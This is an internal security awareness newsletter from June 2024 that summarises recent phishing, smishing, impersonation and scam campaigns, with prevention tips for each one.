Security Awareness Newsletter June 2024
Getting this out a little late. This is a newsletter that I put together for our internal security awareness program. Feel free to grab and use within your own security awareness program. Created with help from ChatGPT.
Rising Threat of Business Email Compromise (BEC) Scams
The FBI’s Internet Crime Complaint Center (IC3) has warned about the growing threat of Business Email Compromise (BEC) scams targeting businesses and individuals to steal money through fraudulent emails.
Key Points:
What is BEC? Cybercriminals hack or spoof business emails to trick victims into transferring funds or revealing sensitive information.
Scam Tactics:
Phishing: Fake emails to access business accounts.
Spoofing: Deceptive email addresses mimicking legitimate ones.
Impersonation: Pretending to be executives or trusted partners.
Recent Trends: Increased targeting of real estate, legal, and financial services with sophisticated AI-generated emails and deepfake audio.
Impact: BEC scams have caused billions in financial losses annually.
Prevention Tips:
Verify any fund transfer requests through separate communication channels.
Educate employees on phishing and suspicious activities.
Use multi-factor authentication (MFA).
Monitor accounts for unusual activities.
Report suspected scams to the IC3 at www.ic3.gov.
Stay vigilant and protect your organization from BEC scams. For more details, visit the full PSA on the IC3 website: FBI IC3 PSA.
Arrests Made in Smishing Text Scam
The City of London Police has announced the arrest of two individuals connected to a sophisticated smishing campaign using a homemade mobile antenna. This operation involved sending thousands of fraudulent text messages to the public, aiming to steal personal and financial information.
Key Details:
Smishing Explained: Smishing (SMS phishing) involves sending text messages that appear to be from reputable sources, urging recipients to provide personal information, click on malicious links, or download harmful software.
How the Scam Worked: The arrested individuals used a homemade mobile antenna to send out mass smishing texts, tricking victims into sharing sensitive data.
Impact: Thousands of people received these fraudulent messages, potentially leading to significant personal and financial losses.
Protect Yourself:
Be Skeptical of Unexpected Texts: Do not click on links or provide personal information in response to unsolicited text messages.
Verify Sources: If you receive a suspicious message claiming to be from a legitimate organization, contact the organization directly using official contact information.
Report Suspicious Messages: Forward suspicious texts to your mobile carrier’s spam reporting service or report them to relevant authorities.
Stay Informed and Safe: For more details on this case and tips to protect yourself from smishing attacks, visit the City of London Police website: City of London Police Smishing Arrests.
Stay vigilant and keep your personal information secure!
Phishing Tactics Targeting Two-Factor Authentication (2FA)
Recent reports from Kaspersky highlight an emerging phishing technique targeting Two-Factor Authentication (2FA) mechanisms, increasing the risk of account compromise even for those using this added layer of security.
Key Findings:
Phishing Techniques: Cybercriminals are evolving their tactics to bypass 2FA, employing sophisticated methods such as phishing bots and transparent phishing pages to deceive users.
OTP Bots: Attackers use bots to automate the process of extracting One-Time Passwords (OTPs) from victims. These bots can mimic legitimate institutions and request OTPs under false pretenses, subsequently allowing attackers to access secured accounts.
How It Works:
Phishing Bots: These bots send automated calls or messages posing as legitimate services, tricking users into revealing their OTPs.
Transparent Phishing: Attackers create fake login pages that appear identical to the real ones. When users enter their credentials and OTPs, the information is captured and used by the attackers to gain unauthorized access.
Prevention Tips:
Verify Requests: Always verify the legitimacy of any request for personal information or OTPs by contacting the organization directly using known contact details.
Educate Employees: Regularly train employees to recognize phishing attempts and the latest tactics used by cybercriminals.
Use Advanced Security Measures: Implement multi-factor authentication (MFA) methods that are resistant to phishing, such as hardware security keys.
Stay Vigilant: Phishing attacks continue to grow in sophistication, posing significant risks even to those who use advanced security measures like 2FA. By staying informed and implementing robust security practices, you can protect yourself and your organization from these evolving threats.
For more detailed information, visit the full article on Kaspersky's blog: Phishing with Cloudflare Workers: Transparent Phishing and HTML Smuggling.
FTC’s Spring Scam Roundup
The FTC’s latest report highlights prevalent scams and their impact on consumers this spring.
Key Findings:
Most Impersonated Companies:
Best Buy’s Geek Squad
Amazon
PayPal
Microsoft (highest reported losses)
Publishers Clearing House
Common Contact Methods:
Email and phone calls dominate.
Social media scams, especially on Facebook and Instagram, result in the highest losses.
Payment Methods:
Investment scams use cryptocurrency and bank transfers.
Gift cards are common in romance, tech support, and government impersonation scams.
Protection Tips:
Verify Requests: Always verify unexpected requests for money or personal information by contacting the source directly.
Avoid Clicking Suspicious Links: Do not respond to unsolicited messages.
Use Secure Payment Methods: Avoid using gift cards, cryptocurrency, or payment apps for urgent payments.
Stay Vigilant: Scams continue to evolve, posing significant risks. By staying informed and following these security tips, you can better protect yourself and your organization.
For more details, visit the FTC’s Spring Scam Roundup.
Stay safe and secure!
Beware of New Phishing Campaign Targeting Job Seekers
A recent phishing campaign has been discovered deploying the WARMCOOKIE backdoor, specifically targeting job seekers. Cybercriminals are using fake job offers to lure victims into opening malicious attachments or clicking on harmful links. Once activated, the WARMCOOKIE backdoor allows attackers to gain unauthorized access to the victim's system, compromising sensitive information.
Key Points:
Be cautious of unsolicited job offers.
Avoid opening attachments or clicking links from unknown sources.
Verify the legitimacy of job offers through official company channels.
Stay vigilant and protect your personal information!
For more details, visit the Hacker News article.
CISA Warns of Criminals Impersonating Its Employees
The Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about criminals impersonating its employees in phone calls. These scammers attempt to deceive victims into transferring money by posing as CISA representatives.
Key Points:
CISA employees will never request money transfers, cryptocurrencies, or gift cards.
Do not comply with demands for secrecy.
Report suspicious calls to CISA at 844-729-2472 or to law enforcement.
Impersonation Scams on the Rise: Last year, impersonation scams resulted in losses of $1.1 billion, highlighting the growing threat and the need for increased vigilance. Scammers posed as FTC staff as part of the scams.
“The FBI's 2023 Internet Crime Report revealed a 22% increase in reported losses to online crime compared to 2022, totaling a record $12.5 billion.”
Tips to Protect Yourself:
Verify the caller's identity through official channels.
Never share personal or financial information over the phone.
For more details, visit the Bleeping Computer article.
Beware of Fraudulent Olympics Ticketing Websites
Recently, Proofpoint uncovered fraudulent websites claiming to sell tickets for the Paris 2024 Summer Olympics. Notably, “paris24tickets[.]com” appeared as a top search result on Google. This site, designed to mimic legitimate ticketing platforms, aimed to steal money and personal information.
Key Findings
Multiple Fraudulent Sites: Over 338 fake Olympics ticketing websites identified, with 51 shut down.
Phishing Tactics: Some sites used search ads, while others used email campaigns offering “discounts.”
Safety Tips: Only purchase tickets through the official Paris 2024 ticketing website.
Stay Safe
Verify URLs before purchasing.
Be cautious of unsolicited emails offering deals on tickets.
Report suspicious websites to authorities.
Stay vigilant and share this information to help others avoid scams. For more details, visit the full article.
Social Engineering Scams via Mail
Social engineering scams aren't limited to digital channels; they can come through the mail too. KnowBe4 highlights a recent case where scammers sent fake refund checks via mail, tricking recipients into depositing them and sending a portion of the funds back. These checks appear realistic, but banks eventually discover they're fake, leaving the victim responsible for the amount.
Protection Tips:
Be skeptical of unexpected checks and financial requests.
Verify the legitimacy of any communication by contacting the company directly.
Educate yourself and others about recognizing various social engineering tactics.
For more details, visit KnowBe4's blog.
Beware of More_eggs Malware Targeting Hiring Managers
Attention Hiring Managers:
A new phishing campaign is using fake resume submissions to distribute the More_eggs malware. Cybercriminals target job listings on platforms like LinkedIn, directing recruiters to malicious websites that trigger a malware infection upon downloading a resume. This backdoor malware can steal sensitive data, deliver additional malicious payloads, and grant remote access to attackers.
Key Recommendations:
Always verify the source of resumes and job applications.
Scan all downloads with reliable antivirus software.
Provide regular security awareness training to all staff, including HR personnel.
Stay vigilant and protect your organization from these sophisticated attacks.
For more details, visit the KnowBe4 blog.
Beware of Fraudulent Olympics Ticketing Websites
As the excitement for the Paris 2024 Summer Olympics builds, so do the efforts of scammers looking to exploit unsuspecting fans. Proofpoint recently discovered multiple fraudulent websites claiming to sell Olympics tickets, with one notably appearing as a top search result on Google. These sites mimic legitimate ticketing platforms, luring users into providing personal and payment information.
Key Points:
Fake Websites: Scammers create realistic-looking websites to steal money and personal data.
Search Ads: Fraudulent sites often appear as sponsored search results.
Official Source: Always purchase tickets through the official Olympics website.
Stay Safe:
Verify the URL: Ensure you are on the official Olympics ticketing site.
Avoid Clicking Ads: Navigate directly to trusted sources.
Be Skeptical: Offers that seem too good to be true likely are.
For more detailed information, read the full article on Proofpoint's blog here.
New Threat: "Paste and Run" Phishing
Overview A new phishing campaign exploits a unique user interaction by tricking users into pasting and executing malicious commands from their clipboard. This technique can install malware such as DarkGate on the victim’s system, bypassing conventional security measures.
Key Takeaways:
Method: Users are instructed to paste clipboard contents into the Windows Run dialog box, executing a malicious PowerShell command.
Impact: This method can lead to significant security breaches, installing malware and compromising systems.
Prevention: Continuous security awareness training can help users recognize and avoid such phishing attempts.
Stay vigilant and regularly update your security protocols. For more details, visit the KnowBe4 Blog.
AI-Driven Travel Scams on the Rise
Overview Booking.com warns that the rise of artificial intelligence (AI) is driving a significant increase in travel scams. According to Marnie Wilking, the firm's internet safety boss, there has been a 500 to 900% surge in scams over the past 18 months, particularly phishing attacks.
Key Takeaways:
Increase in Phishing: Generative AI tools like ChatGPT are being used to create highly convincing phishing emails, tricking people into handing over their financial details through fake booking links.
Targeted Platforms: Scammers often target popular sites like Booking.com and Airbnb, listing fake accommodations to scam users out of money.
Detection Challenges: AI-generated content makes scams harder to detect due to realistic images and accurate text in multiple languages.
For further details, refer to the BBC News Article.
Protect Yourself from Summer Vacation Scams
Overview As summer approaches, the excitement of planning vacations is in full swing. However, cybercriminals are also gearing up, exploiting this time to launch scams targeting travelers. Check Point Research (CPR) has observed a significant rise in phishing scams and malicious websites related to summer vacations.
Key Takeaways:
Rise in Malicious Domains: In May 2024, CPR identified that 1 in every 33 new vacation-related domains were malicious or suspicious.
Phishing Emails: Scammers are using realistic phishing emails to trick users into revealing personal information. One campaign mimicked Booking.com invoices to lure victims.
Malicious Websites: Fraudulent websites like booking-secure928[.]com and hotel-housekeeper[.]com imitate legitimate travel sites to steal login credentials.
Stay informed and vigilant to protect yourself from these evolving cyber threats. For more detailed information, visit Check Point’s blog on staying safe during summer vacations.